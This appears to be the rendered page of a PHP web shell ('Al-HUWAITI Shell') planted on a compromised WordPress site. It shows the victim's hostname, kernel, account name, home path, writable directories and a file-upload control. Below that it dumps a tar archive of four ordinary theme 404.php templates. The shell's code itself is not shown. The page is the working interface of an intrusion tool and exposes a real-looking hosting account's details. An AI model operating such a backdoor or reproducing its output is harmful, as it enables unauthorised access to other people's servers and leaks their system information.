hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : chryzalihi ( 621211)
PHP Version : 8.3.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/c/h/r/chryzalihi/www/wp-content/languages/themes/the/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/c/h/r/chryzalihi/www/wp-content/languages/themes/the/404.php.tar
home/chryzalihi/www/wp-content/themes/hello-elementor/template-parts/404.php000064400000001135152425662160023137 0ustar00<?php
/**
 * The template for displaying 404 pages (not found).
 *
 * @package HelloElementor
 */
if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

?>
<main id="content" class="site-main">

	<?php if ( apply_filters( 'hello_elementor_page_title', true ) ) : ?>
		<div class="page-header">
			<h1 class="entry-title"><?php echo esc_html__( 'The page can&rsquo;t be found.', 'hello-elementor' ); ?></h1>
		</div>
	<?php endif; ?>

	<div class="page-content">
		<p><?php echo esc_html__( 'It looks like nothing was found at this location.', 'hello-elementor' ); ?></p>
	</div>

</main>
home/chryzalihi/www/wp-content/themes/bloglo/404.php000064400000001276152425672530016370 0ustar00<?php
/**
 * The template for displaying 404 pages (not found).
 *
 * @link https://codex.wordpress.org/Creating_an_Error_404_Page
 *
 * @package     Bloglo
 * @author      Peregrine Themes
 * @since       1.0.0
 */

?>

<?php get_header(); ?>

<div class="bloglo-container">

	<div id="primary" class="content-area">

		<?php do_action( 'bloglo_before_content' ); ?>

		<main id="content" class="site-content" role="main"<?php bloglo_schema_markup( 'main' ); ?>>

			<?php do_action( 'bloglo_content_404' ); ?>

		</main><!-- #content .site-content -->

		<?php do_action( 'bloglo_after_content' ); ?>

	</div><!-- #primary .content-area -->

</div><!-- END .bloglo-container -->

<?php
get_footer();
home/chryzalihi/www/wp-contentOLD/themes/longevity/404.php000060400000002625152434060400017447 0ustar00<?php
/**
 * The template for displaying 404 pages (not found)
 *
 * @package Longevity
 */

 ?>
 
 <!DOCTYPE html>
<html <?php language_attributes(); ?> class="no-js">
<head>
	<meta charset="<?php bloginfo( 'charset' ); ?>">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>

    <section id="primary" class="content-area valign-wrapper">
        <main id="main" class="site-main">
            
            <div class="entry-content">
            
                   <header class="entry-header">
                   	<h1 class="page-title"><?php esc_html_e( 'Page not found', 'longevity' ); ?></h1>
                  </header>
                  
              <h2 class="entry-title"><?php esc_html_e( 'This is also somewhat embarrassing for us.', 'longevity' ); ?></h2>
            <p><?php esc_html_e( 'It looks like something went wrong somewhere. Perhaps try doing a search with keywords related to what you were looking for?', 'longevity' ); ?></p>

            <p><?php get_search_form(); ?></p>
            
            <p><a href="<?php echo esc_url( home_url( '/' ) ); ?>" class="nav-link"><?php esc_html_e( 'Return to the Homepage here', 'longevity' ); ?></a></p>
    
		</div>
                 
             </main>
</section>

</body>
</html>home/chryzalihi/www/wp-contentOLD/themes/twentytwenty/404.php000060400000001530152434136300020231 0ustar00<?php
/**
 * The template for displaying the 404 template in the Twenty Twenty theme.
 *
 * @package WordPress
 * @subpackage Twenty_Twenty
 * @since Twenty Twenty 1.0
 */

get_header();
?>

<main id="site-content" role="main">

	<div class="section-inner thin error404-content">

		<h1 class="entry-title"><?php _e( 'Page Not Found', 'twentytwenty' ); ?></h1>

		<div class="intro-text"><p><?php _e( 'The page you were looking for could not be found. It might have been removed, renamed, or did not exist in the first place.', 'twentytwenty' ); ?></p></div>

		<?php
		get_search_form(
			array(
				'label' => __( '404 not found', 'twentytwenty' ),
			)
		);
		?>

	</div><!-- .section-inner -->

</main><!-- #site-content -->

<?php get_template_part( 'template-parts/footer-menus-widgets' ); ?>

<?php
get_footer();

Al-HUWAITI Shell